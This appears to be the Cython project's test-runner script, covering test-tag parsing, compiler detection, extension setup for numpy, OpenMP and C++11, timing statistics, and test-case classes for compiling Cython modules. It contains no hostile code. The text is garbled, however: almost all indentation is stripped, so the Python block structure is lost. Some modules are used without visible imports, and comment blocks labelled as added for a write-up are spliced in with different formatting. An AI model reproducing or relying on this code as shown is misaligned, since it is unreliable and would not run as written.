import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
from collections import defaultdict
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
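# Illustrative example added for this write-up (an assumption, not part of the test runner): what
# ``def_to_cdef`` produces for a small module-level function. The sample source below is hypothetical;
# decorators are dropped and the typed arguments move to the generated ``cdef`` helper.
_DEF_TO_CDEF_EXAMPLE = '''\
@cython.test_assert_path_exists("//ReturnStatNode")
def add(int a, int b):
    """
    >>> add(1, 2)
    3
    """
    return a + b
'''
# def_to_cdef(_DEF_TO_CDEF_EXAMPLE) returns (roughly):
#   def add(a, b):
#       """
#       >>> add(1, 2)
#       3
#       """
#       return add_c(a, b)
#
#   cdef add_c(int a, int b):
#       return a + b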
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro and getattr(numpy, '__version__', '') not in ('1.19.0', '1.19.1'):
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_gdb_extension(ext, _has_gdb=[None]):
# We should probably also check for Python support.
if not include_debugger:
_has_gdb[0] = False
if _has_gdb[0] is None:
try:
subprocess.check_call(["gdb", "--version"])
except (IOError, subprocess.CalledProcessError):
_has_gdb[0] = False
else:
_has_gdb[0] = True
if not _has_gdb[0]:
return EXCLUDE_EXT
return ext
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
    update cpp11 extensions; they are only built with gcc > 4.8 or with clang
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
    returns the version output of the C or C++ compiler, obtained by invoking it with ``-v`` via Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
from distutils import ccompiler
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
    Returns a two-tuple of (CFLAGS, LDFLAGS) needed to build the OpenMP extension.
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:gdb': update_gdb_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
'tag:py3only': exclude_extension_in_pyver((2, 7)),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
'run.unicode_imports', # encoding problems on appveyor in Py2
'run.reimport_failure', # reimports don't do anything in Py2
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
'run.time_pxd', # _PyTime_GetSystemClock doesn't exist in 3.4
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
CDEFS = []
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
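# Illustrative example added for this write-up (an assumption, not part of the test runner):
# ``parse_tags`` reads the leading comment block of a test file, e.g.
#
#   # mode: run
#   # tag: numpy, openmp
#   # ticket: 1234
#
# and returns a defaultdict equivalent to
#   {'mode': ['run'], 'tag': ['numpy', 'openmp'], 'ticket': ['1234']}.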
list_unchanging_dir = memoize(lambda x: os.listdir(x)) # needs lambda to set function attribute
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items(), key=operator.itemgetter(1), reverse=True):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
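# Illustrative sketch added for this write-up (an assumption, not part of the test runner): the
# "slowest tests" bookkeeping in Stats.add_time keeps only the top N entries by pushing onto a min-heap
# and, once the heap is full, popping the smallest element on every push. A stand-alone version of the
# same pattern:
def _keep_n_largest(items, n=8):
    import heapq
    top = []
    for item in items:
        push = heapq.heappushpop if len(top) >= n else heapq.heappush
        push(top, item)  # once full, this drops the current smallest entry
    return heapq.nlargest(n, top)  # largest first, as in print_stats()


# _keep_n_largest([(0.1, 'a'), (2.5, 'b'), (0.7, 'c')], n=2) == [(2.5, 'b'), (0.7, 'c')]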
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.doctest_selector = re.compile(options.only_pattern).search if options.only_pattern else None
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
# TODO: parallelise I/O with a thread pool for the different directories once we drop Py2 support
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if (sys.platform not in ['win32'] and self.add_embedded_test
# the embedding test is currently broken in Py3.8+, except on Linux.
and (sys.version_info < (3, 8) or sys.platform != 'darwin')):
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if 'c' in languages and skip_c(tags):
languages = list(languages)
languages.remove('c')
if 'cpp' in languages and 'no-cpp' in tags['tag']:
languages = list(languages)
languages.remove('cpp')
if not languages:
return []
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
doctest_selector=self.doctest_selector,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
        # MSVC: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False, doctest_selector=None,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.doctest_selector = doctest_selector
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in (
'warning_errors',
'clear_to_none',
'error_on_unknown_names',
'error_on_uninitialized',
# 'cache_builtins', # not currently supported due to incorrect global caching
)
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
ext_compile_defines = CDEFS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
define_macros=ext_compile_defines,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
